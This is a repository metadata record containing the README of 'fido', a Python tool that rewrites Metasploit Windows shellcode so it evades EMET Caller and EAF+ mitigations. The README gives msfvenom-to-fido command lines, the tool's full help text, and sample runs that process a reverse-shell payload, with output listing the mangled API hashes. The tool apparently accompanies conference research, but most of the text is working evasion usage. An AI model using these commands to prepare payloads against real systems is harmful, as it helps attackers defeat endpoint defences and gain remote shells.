{"id":13464679,"url":"https://github.com/secretsquirrel/fido","last_synced_at":"2025-08-21T02:32:00.920Z","repository":{"id":70395861,"uuid":"63283120","full_name":"secretsquirrel/fido","owner":"secretsquirrel","description":"Teaching old shellcode new tricks","archived":false,"fork":false,"pushed_at":"2017-08-01T12:40:41.000Z","size":18762,"stargazers_count":203,"open_issues_count":0,"forks_count":60,"subscribers_count":21,"default_branch":"master","last_synced_at":"2024-12-10T05:42:56.301Z","etag":null,"topics":["assembly","emet","iat-parsing","metasploit","msfvenom","shellcode"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/secretsquirrel.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2016-07-13T22:14:13.000Z","updated_at":"2024-08-12T19:23:49.000Z","dependencies_parsed_at":"2023-04-24T19:47:06.252Z","dependency_job_id":null,"html_url":"https://github.com/secretsquirrel/fido","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/secretsquirrel%2Ffido","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/secretsquirrel%2Ffido/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/secretsquirrel%2Ffido/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/secretsquirrel%2Ffido/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/secretsquirrel","download_url":"https://codeload.github.com/secretsquirrel/fido/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":230479864,"owners_count":18232630,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["assembly","emet","iat-parsing","metasploit","msfvenom","shellcode"],"created_at":"2024-07-31T14:00:48.534Z","updated_at":"2024-12-19T18:18:03.425Z","avatar_url":"https://github.com/secretsquirrel.png","language":"Python","funding_links":[],"categories":["Python"],"sub_categories":[],"readme":"# fido\nTeaching an old shellcode new tricks\n\nGive fido.py a x86 (32 bit or 64 bit) windows shellcode and it will strip off Stephen Fewer's hash API stub and replace it \nwith something that bypasses EMET Caller and EAF+ checks but keeps the actual API calls in use.\n\n# WARNING: If the 2nd stage payload uses the hash api from metasploit that loads Win APIs from the Export Address Table and jmp's into them, EMET will catch it.\n\nIf the warning didn't make sense, you might want to walk away or read up: \n\n* REcon BR Slides: https://github.com/secretsquirrel/fido/blob/master/REconBR_2017.pdf\n* Defcon 25 Slides: https://github.com/secretsquirrel/fido/blob/master/Defcon_25_2017.pdf\n* Demo1 (Hash Mangling POC): https://youtu.be/p3vFRx5dur0\n* Demo2 (Tor Exploit POC): https://youtu.be/oqHT6Ienudg\n\n## Usage\n\nCan take input from stdout and output to stdout:\n```\nmsfvenom -p windows/exec CMD=calc EXITFUNC=thread | ~/github/fido/testharness.py -m -b Tcpview.exe -p ExternGPA -t win10  \u003e test.bin\n```\n\nCan take input from cmdline (via -s).\n\nWant win7-win10 compatibility?  Use the following command:\n\n```\nmsfvenom -p windows/exec CMD=calc EXITFUNC=thread | ~/github/fido/fido.py -p ExternGPA -l api-ms-win-core-libraryloader-l1-1-0.dll -d kernel32.dll \u003e test.bin\n```\n\nThis will use GetProcAddress in api-ms-win-core-libraryloader-l1-1-0.dll import from the kernel32.dll loaded module. \n\n\nHelp output:\n\n```\n[!] -s is required either from cmd line flag or stdin \u003ccat code.bin\u003e | ./fido.py\nusage: use \"fido.py --help\" for more information\n\nThis code imports metasploit sourced x86 windows shellcode that employs\nStephen Fewers Hash API stub and replaces it to bypass EMET Caller/EAF checks\nand other bolt on mitigations. Accepts msfvenom output from stdin or from disk.\nDoesn't do logic checks on provided payload to ensure it is x86 (32bit) or for windows\nOS (up to you to be correct)\n\npositional arguments:\n  infile\n  outfile\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -b TARGETBINARY, --targetbinary TARGETBINARY\n                        Binary that shellcode will be customized to (Optional)\n  -t OS, --OSTarget OS  OS target for looking for target DLL Import Tables: winXP, win7, win8, winVista, win10\n  -s CODE, --shellcode CODE\n                        x86/x64 Windows Shellcode with Stephen Fewers Hash API prepended (from msfvenom) can be from stdin\n  -d DLL, --DLLName DLL\n                        If you know the DLL in the IAT you are targeting enter this, no need for OS flag.\n  -l IMPORTNAME, --Import IMPORTNAME\n                        For use with -d and ExternGPA (-p), specify either 'kernel32.dll' or\n                        'api-ms-win-core-libraryloader' -- you need to know with import you are targeting.\n                        To know, run without -d for a list of candidates. Default is kernel32.dll but not always right!\n\n  -m, --mangle          Mangle metasploit hash apis from their original values (you want to do this)\n  -o OUTPUT, --output OUTPUT\n                        How you would like your output: [c], [p]ython, c[s]harp Default: stdout.\n  -p PARSER_STUB, --parser_stub PARSER_STUB\n                        By default this assumes that GetProcAddress (GPA) is in the targetbinary's\n                        Import Address Table (IAT) if no targetbinary or DLL name is provided.\n                        Four options:\n                            GPA  - GPA is in targetbinary IAT (default)\n                            LLAGPA - LoadlibraryA(LLA)/GPA is in the targetbinary IAT (smallest shellcode option)\n                            ExternGPA -- need DLLName or targetbinary to use\n                            ExternLLAGPA -- need DLLName or targetbinary to use\n                            ExternGPAFC -- -d kernel32.dll -l kernelbase.dll  # only works on win8 - win10\n                            OffsetGPA -- -b target.EXE # static offset to that version of software (target EXE)\n                            ExternOffsetGPA -- -b target.DLL -d import_dll # static\n  -n, --donotfail       Default: Fail if Stephen Fewers Hash API stub is not there, use -n to bypass\n  -M MODE, --mode MODE ASM mode 32 or 64, usually automatic\n```\n\n## Other Examples:\n\n ### ExternGPAFC\nWorks on Win8-Win10 only.\n```\n cat ~/github/metasploit-framework/reverse_shell_x64_8080_172.16.186.1.bin |  ./fido.py -b ~/github/the-backdoor-factory/whois64.exe -m -p ExternGPAFC -t win10 \u003e test.bin\n[*] Length of submitted payload: 0x1cc\n[*] Stripping Stripping Fewers 64bit hash stub \n[*] Length of code after stripping: 258\n[*] Disassembling payload\n[*] Mangling kernel32.dll!LoadLibraryA call hash: 0x5df8d241\n[*] Mangling ws2_32.dll!WSAStartup call hash: 0xe6fe222e\n[*] Mangling ws2_32.dll!WSASocketA call hash: 0x16f19f04\n[*] Mangling ws2_32.dll!connect call hash: 0x76223a2d\n[*] Mangling kernel32.dll!CreateProcessA call hash: 0x6d6e1502\n[*] Mangling kernel32.dll!WaitForSingleObject call hash: 0x44e7a13f\n[*] Mangling kernel32.dll!ExitThread call hash: 0x5a4eb474\n[*] Mangling kernel32.dll!GetVersion call hash: 0xf1669f77\n[*] Mangling ntdll.dll!RtlExitUserThread call hash: 0x66b4939a\n[*] Called APIs: ['kernel32.dll!LoadLibraryA', 'ws2_32.dll!WSAStartup', 'ws2_32.dll!WSASocketA', 'ws2_32.dll!connect', 'kernel32.dll!CreateProcessA', 'kernel32.dll!WaitForSingleObject', 'kernel32.dll!ExitThread', 'kernel32.dll!GetVersion', 'ntdll.dll!RtlExitUserThread']\n[*] String Table: b'ExitThread\\x00WSASocketA\\x00CreateProcessA\\x00kernel32\\x00LoadLibraryA\\x00RtlExitUserThread\\x00ws2_32\\x00connect\\x00GetVersion\\x00WaitForSingleObject\\x00ntdll\\x00WSAStartup\\x00'\n[*] Building lookup table\n[*] Using ExternGPAFC from  hash: 0x0, import name: kernelbase.dll\n[*] Assembling lookup table stub\n[*] Payload complete\n[*] Output size: 964\n\n```\n\n\n ### ExternOffset\nUses the exact location of GetProcAddress Offset for a particular dll and import dll. In this case, kernel32_10.0.16237_32bit.dll is the target version bianry, and GPA exists in kernel32.dll via (minwin).\n\n```\ncat ~/github/metasploit-framework/reverse_shell_x64_8080_172.16.186.1.bin |  ./fido.py -b kernel32_10.0.16237_32bit.dll -d kernel32.dll -m -p ExternOffsetGPA -t win10 \u003e test.bin                          \n[*] Length of submitted payload: 0x1cc\n[*] Stripping Stripping Fewers 64bit hash stub \n[*] Length of code after stripping: 258\n[*] Disassembling payload\n[*] Mangling kernel32.dll!LoadLibraryA call hash: 0x89d3d69b\n[*] Mangling ws2_32.dll!WSAStartup call hash: 0x23b6665d\n[*] Mangling ws2_32.dll!WSASocketA call hash: 0x7c77f885\n[*] Mangling ws2_32.dll!connect call hash: 0x78e785f1\n[*] Mangling kernel32.dll!CreateProcessA call hash: 0x53e02b59\n[*] Mangling kernel32.dll!WaitForSingleObject call hash: 0xcb5b4068\n[*] Mangling kernel32.dll!ExitThread call hash: 0xcd188037\n[*] Mangling kernel32.dll!GetVersion call hash: 0x6a298791\n[*] Mangling ntdll.dll!RtlExitUserThread call hash: 0x1b59416e\n[*] Called APIs: ['kernel32.dll!LoadLibraryA', 'ws2_32.dll!WSAStartup', 'ws2_32.dll!WSASocketA', 'ws2_32.dll!connect', 'kernel32.dll!CreateProcessA', 'kernel32.dll!WaitForSingleObject', 'kernel32.dll!ExitThread', 'kernel32.dll!GetVersion', 'ntdll.dll!RtlExitUserThread']\n[*] String Table: b'RtlExitUserThread\\x00WSAStartup\\x00CreateProcessA\\x00WaitForSingleObject\\x00WSASocketA\\x00LoadLibraryA\\x00ws2_32\\x00GetVersion\\x00ExitThread\\x00ntdll\\x00connect\\x00kernel32\\x00'\n[*] Building lookup table\n[*] Loading PE in pefile\n[*] Parsing data directories\n[*] Found API: loadlibrarya\n[*] Found API: getprocaddress\n[*] Both LLA/GPA APIs found!\n[*] Using ExternOffsetGPA from kernel32.dll hash: 0x6a4abc5b, import name: main_module\n[*] Parsing data directories...\n[*] GPA offset: 0x710a8\n[*] Assembling lookup table stub\n[*] Payload complete\n[*] Output size: 830\n```\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsecretsquirrel%2Ffido","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsecretsquirrel%2Ffido","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsecretsquirrel%2Ffido/lists"}